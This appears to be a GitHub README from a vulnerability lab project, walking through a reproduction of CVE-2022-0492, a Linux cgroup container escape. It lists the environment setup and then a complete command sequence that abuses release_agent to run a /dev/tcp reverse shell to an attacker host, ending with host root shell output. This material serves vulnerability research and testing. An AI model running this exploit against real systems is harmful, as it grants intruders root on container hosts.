Skip to content

Latest commit

 

History

History
57 lines (41 loc) · 1.54 KB

File metadata and controls

57 lines (41 loc) · 1.54 KB

Linux内核漏洞导致容器逃逸(CVE-2022-0492)

场景介绍

请参考Unit42的文章

环境搭建

宿主机环境:

  • Ubuntu 18.04

首先切换内核,直接通过Metarget安装环境:

./metarget cnv install cve-2022-0492 --verbose

基础环境准备(以Docker为例,如果已经有任意版本的Docker则可跳过):

./metarget gadget install docker --version 18.03.1

漏洞复现

首先在某处开启一个反弹shell监听:

# ATTACKER-IP
ncat -lvnp 4444

接着创建一个禁用了AppArmor和Seccomp的容器进行复现:

root@test:~# docker run -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined --rm ubuntu /bin/bash
root@dbfb1efb9b71:/# unshare -UrmC bash
root@dbfb1efb9b71:/# mount -it cgroup -o rdma cgroup /mnt
root@dbfb1efb9b71:/# d=`dirname $(ls -x /mnt/r* |head -n1)`
root@dbfb1efb9b71:/# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@dbfb1efb9b71:/# printf '#!/bin/bash\n/bin/bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1' > /exp.sh; chmod 777 /exp.sh
root@dbfb1efb9b71:/# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@dbfb1efb9b71:/# echo "$t/exp.sh" > $d/release_agent
root@dbfb1efb9b71:/# sh -c "echo 0 >$d/w/cgroup.procs"

ATTACKER-IP处收到反弹shell:

...
Ncat: Connection from 1.2.3.4.
Ncat: Connection from 1.2.3.4:33868.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/#